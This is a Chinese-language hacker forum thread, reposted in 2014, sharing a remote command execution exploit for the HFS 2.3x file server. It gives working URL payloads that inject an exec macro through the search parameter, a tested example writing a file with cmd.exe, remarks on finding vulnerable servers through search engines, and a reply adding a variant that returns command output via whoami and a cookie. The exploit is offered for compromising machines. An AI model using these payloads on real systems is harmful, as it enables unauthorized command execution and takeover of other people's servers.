搜索
中国白客联盟»论坛 Techniques 0day及EXP(0day and POC) [转]HFS 2.3x 远程命令执行(抓鸡黑客末日)
返回列表 发新帖
查看: 451|回复: 1

[转]HFS 2.3x 远程命令执行(抓鸡黑客末日)

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-9-14 12:40:19 | 显示全部楼层 |阅读模式
从某论坛看见的,转载部分:
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。

http://localhost:80/?search==%00{.exec|cmd.}

http://localhost:80/search=%00{.exec|cmd.}

注:有些版本search前面是没有?的。

测试部分:
百度搜HFS默认就是2.3x版本,执行echo测试成功:
http://localhost:8080/?search==%00{.exec|cmd.exe%20/c%20echo>c:/1.txt%20123.}
google hack了一下,发现一个抓鸡黑阔:














已测试官方最新版,一样存在。


撒旦似乎不少:













本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x

评分

参与人数 1金钱 +1 收起 理由
Object + 1 很给力!

查看全部评分

过段时间可能会取消签到功能了
回复

使用道具 举报

susftp 该用户已被删除
发表于 2015-10-3 18:37:45 | 显示全部楼层
带回显的方法:
?search==%00{.exec|cmd.exe%20/c%20whoami>1.txt.}{.cookie|2|value={.load|1.txt.}.}
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表